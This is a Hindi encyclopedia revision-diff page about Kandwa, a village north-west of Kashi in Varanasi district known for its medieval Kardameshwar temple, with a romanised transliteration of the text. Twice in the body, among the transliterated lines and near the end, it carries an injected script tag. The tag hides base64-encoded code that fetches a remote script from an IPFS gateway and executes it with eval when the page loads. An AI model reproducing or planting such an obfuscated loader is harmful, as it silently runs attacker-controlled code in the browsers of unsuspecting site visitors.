Difference between revisions of "कंदवा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
*'''कंदवा''' [[उत्तर प्रदेश]] राज्य के [[वाराणसी ज़िला|वाराणसी ज़िले]] में स्थित था।  
कंदवा [[उत्तर प्रदेश]] राज्य के [[वाराणसी ज़िला|वाराणसी ज़िले]] में स्थित था। कंदवा [[काशी]] से लगभग छ: मील उत्तर-पश्चिम में है। कंदवा ग्राम में कर्दमेश्वर का मध्यकालीन सुंदर मंदिर है। कंदवा की शिल्पकला अत्युत्कृष्ट है। मंदिर के बाहरी भाग पर अनेक देव-मूर्तियां हैं।
+
*कंदवा [[काशी]] से लगभग छ: मील [[उत्तर (दिशा)|उत्तर]]-[[पश्चिम दिशा|पश्चिम]] में है।  
 +
*कंदवा [[ग्राम]] में '''कर्दमेश्वर''' का मध्यकालीन सुंदर मंदिर है।  
 +
*कंदवा की शिल्पकला अत्युत्कृष्ट है।  
 +
*मंदिर के बाहरी भाग पर अनेक देव-मूर्तियां हैं।
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 122| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 +
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
  
Line 10: Line 17:
 
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}
 
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}
 
[[Category:उत्तर प्रदेश]]
 
[[Category:उत्तर प्रदेश]]
[[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]]
+
[[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]] [[Category:ऐतिहासिक स्थानावली]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:नया पन्ना]]
+
 
 
__INDEX__
 
__INDEX__

Latest revision as of 12:37, 22 May 2018

  • kandava uttar pradesh rajy ke varanasi zile mean sthit tha.
  • kandava kashi se lagabhag chh: mil uttar-pashchim mean hai.
  • kandava gram mean kardameshvar ka madhyakalin suandar mandir hai.
  • kandava ki shilpakala atyutkrisht hai.
  • mandir ke bahari bhag par anek dev-moortiyaan haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 122| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>